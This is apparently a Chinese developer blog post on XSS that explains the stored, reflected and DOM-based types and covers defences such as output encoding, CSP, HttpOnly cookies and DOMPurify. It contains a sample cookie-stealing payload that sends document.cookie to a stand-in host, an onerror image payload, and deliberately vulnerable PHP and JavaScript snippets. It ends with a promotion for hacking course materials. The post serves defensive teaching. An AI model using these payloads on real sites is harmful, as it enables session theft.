XSS 攻击深度解析：3 大类型 + 防御方案，开发者必看的安全指南

最新推荐文章于 2025-12-03 15:15:40 发布

原创最新推荐文章于 2025-12-03 15:15:40 发布 · 861 阅读

16 ·

CC 4.0 BY-SA版权

文章标签：

#xss #安全 #前端

网络安全同时被 3 个专栏收录

3148 篇文章

订阅专栏

程序员

3071 篇文章

订阅专栏

黑客技术

116 篇文章

订阅专栏

在 Web 安全领域，XSS（跨站脚本攻击，Cross-Site Scripting）是和 SQL 注入并列的 “元老级” 高危漏洞。即便在 2025 年的 OWASP Top 10 榜单中，它仍稳居前列 —— 某电商平台曾因 XSS 漏洞导致百万用户 Cookie 被窃取，某政务系统因存储型 XSS 遭遇钓鱼攻击，这些真实案例都印证了它的破坏力。本文将从本质、核心类型到防御手段全程拆解，帮开发者彻底搞懂 XSS 攻防逻辑。

一、先搞懂：XSS 攻击的本质是什么？

XSS 的核心是 “恶意 JavaScript 代码注入并执行”。简单说，开发者未对用户输入的内容做安全处理，导致攻击者构造的 JS 代码被嵌入网页，当其他用户访问该页面时，代码在其浏览器中执行，进而实现窃取 Cookie、伪造操作、钓鱼诈骗等攻击目的。

很多人会疑惑：“浏览器不是会拦截恶意脚本吗？” 实际上，浏览器的默认防护仅能拦截明显的恶意代码，而经过变形、伪装的注入语句很容易绕过检测，这也是 XSS 至今频发的关键原因。

二、XSS 的 3 大核心类型：从原理到场景逐个拆解

根据代码注入方式和执行场景的不同，XSS 主要分为存储型、反射型、DOM 型三类，三者的攻击链路和危害范围差异显著。

1. 存储型 XSS：最危险的 “持久化攻击”

核心原理：攻击者将恶意 JS 代码注入到网站的 “持久化存储” 中（如数据库、评论区、用户资料表），当其他用户访问包含该代码的页面时，代码自动执行。由于代码会长期存在于网站中，攻击范围会持续扩大。

典型场景：评论区、留言板、文章发布功能

举个实际案例：某博客的评论功能未做过滤，攻击者提交评论

< script>document.location.href=‘http://hack.com/steal?cookie=’+document.cookie

该代码会被存入数据库，当其他用户查看这篇博客的评论时，浏览器会执行脚本，将自己的 Cookie 发送到攻击者的服务器，导致账号被盗。

危害等级：★★★★★

一旦成功注入，所有访问该页面的用户都会受影响，极易引发大规模数据泄露。

2. 反射型 XSS：“一次性” 的即时攻击

核心原理：恶意 JS 代码通过 URL 参数、表单提交等方式 “即时注入”，服务器未做处理就直接将代码反射到页面中，仅在当前请求中执行 —— 攻击者需诱导用户点击包含恶意代码的链接才能触发。

典型场景：搜索框、登录失败提示、URL 参数展示页面

比如某网站的搜索功能代码如下（PHP 示例）：

$keyword = $_GET['keyword'];
echo "搜索结果：" . $keyword; // 直接输出未过滤

攻击者构造链接 http://target.com/search?keyword=，当用户点击该链接时，keyword 参数中的 JS 代码被直接输出到页面并执行。若将代码替换为窃取 Cookie 的脚本，即可实现攻击。

危害等级：★★★★☆

攻击依赖 “用户点击”，但通过钓鱼邮件、社交软件诱导等方式，仍能实现精准攻击（如针对企业员工的定向钓鱼）。

3. DOM 型 XSS：不经过服务器的 “前端注入”

核心原理：与前两类不同，DOM 型 XSS 完全发生在前端 —— 攻击者通过 URL 参数、本地存储等方式构造恶意输入，操控页面的 DOM 结构（如通过document.write、innerHTML等 API），使恶意 JS 代码被执行，整个过程服务器未参与代码的存储或反射。

典型场景：基于 URL 参数渲染页面元素、前端模板渲染举个例子：某页面通过 URL 参数展示用户昵称，前端代码如下：

let nickname = location.href.split('nickname=')[1];
document.getElementById('nick').innerHTML = nickname; // 直接插入DOM

攻击者构造链接 http://target.com/user?nickname=<img src=x οnerrοr=alert(‘DOM XSS’)>，用户点击后，前端代码将参数值通过innerHTML插入页面，img标签的onerror事件触发时，隐藏的 JS 代码执行。

危害等级：★★★★☆

由于不经过服务器，传统的服务器端过滤手段对其无效，需前端单独做防护。

三类 XSS 核心差异对比

在这里插入图片描述

三、XSS 防御：开发者能落地的 4 个核心方案

XSS 的防御核心是 “切断恶意代码的注入与执行链路”，结合三类 XSS 的特性，需从输入、输出、前端防护三个层面构建体系。

1. 输入过滤：从源头拦截恶意输入

对用户输入的内容做 “白名单校验”（优先）或 “黑名单过滤”：

白名单：仅允许指定格式的内容（如昵称仅允许字母、数字、中文），例如通过正则表达式限制输入：/¹{2,10}$/；
黑名单：过滤<script, > 、onerror、onclick等敏感标签和事件，但若遇到代码变形（如<scr<,script>ipt>）易失效，仅作为辅助手段。

2. 输出编码：让注入代码 “失效”

这是最关键的防御手段 —— 将用户输入的内容在输出到页面时进行编码，把特殊字符转为浏览器无法解析为脚本的实体格式。不同输出场景需对应不同编码方式：

嵌入 HTML 标签内（如<,div>内容）：采用 HTML 实体编码（如<转<、>转>）
嵌入 JS 代码中（如var a=“用户输入”）：采用 JS 编码（如转义引号、特殊字符）
嵌入 URL 参数中：采用 URL 编码（如&转%26、=转%3D）。

以 Java 为例，使用工具类实现 HTML 编码：

public static String htmlEncode(String input) {
if (input == null) return null;
input = input.replace("<", "&lt;")
             .replace(">", "&gt;")
             .replace("'", "&#39;")
             .replace("\"", "&quot;");
return input;
}

3. 开启浏览器安全防护：低成本加固

CSP（内容安全策略）：通过 HTTP 响应头Content-Security-Policy限制脚本加载来源，例如 Content-Security-Policy: default-src ‘self’; script-src ‘self’ 表示仅允许加载自身域名的脚本，直接阻断外部恶意脚本执行
X-XSS-Protection：开启浏览器内置 XSS 防护，响应头配置 X-XSS-Protection: 1; mode=block，浏览器检测到 XSS 时会直接阻断页面加载；
HttpOnly Cookie：给敏感 Cookie 添加HttpOnly属性（如Set-Cookie: sessionid=xxx; HttpOnly），禁止 JS 通过document.cookie获取 Cookie，从根源杜绝 Cookie 窃取。

4. 前端针对性防护：破解 DOM 型 XSS

针对 DOM 型 XSS，需避免使用危险的 DOM 操作 API：

禁用document.write、innerHTML等直接插入 HTML 的 API，优先使用textContent（仅渲染文本，不解析 HTML）；

若必须使用innerHTML，需先通过前端过滤库（如 DOMPurify）净化输入内容，示例：

import DOMPurify from 'dompurify';
let unsafeHtml = location.href.split('nickname=')[1];
let safeHtml = DOMPurify.sanitize(unsafeHtml); // 净化恶意代码
document.getElementById('nick').innerHTML = safeHtml;

四、新手避坑：3 个常见的 XSS 防御误区

1、“前端过滤就行，后端不用管”：前端过滤可被轻易绕过（如禁用 JS、修改前端代码），必须在后端重复做过滤和编码，实现 “前后端双重校验”

2、“只防御存储型，反射型危害小”：反射型 XSS 是钓鱼攻击的常用手段，针对企业内部系统的定向攻击可能导致核心数据泄露

3、“用了 CSP 就万事大吉”：CSP 需合理配置规则，若配置过松（如script-src *）则形同虚设，需结合业务场景精准限制来源。

总结

XSS 攻击的核心矛盾是 “用户输入的不可信性”，三类攻击虽场景不同，但防御的核心逻辑一致 ——“不信任任何用户输入，从输入过滤、输出编码、安全配置三个层面构建防护”。对开发者而言，无需追求复杂的漏洞利用技巧，把基础防御手段落地（如输出编码、HttpOnly Cookie、CSP），就能规避 90% 以上的 XSS 风险。

为帮助大家快速落地，我整理了《XSS 防御实战包》，包含：输入过滤正则库、前后端编码工具类、CSP 配置模板、DOMPurify 使用指南，点击下方链接即可领取。

🐵这些东西我都可以免费分享给大家，需要的可以点这里自取👉:网安入门到进阶资源

题外话

黑客&网络安全如何学习

如果你也对网路安全技术感兴趣，但是又没有合适的学习资源，我可以把私藏的网安学习资料免费共享给你们，来看看有哪些东西。

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我们和网安大厂360共同研发的的网安视频教程，内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识，而且包含了中级的各种渗透技术，并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频，100多本网安电子书，最新学习路线图和工具安装包都有，不用担心学不全。
在这里插入图片描述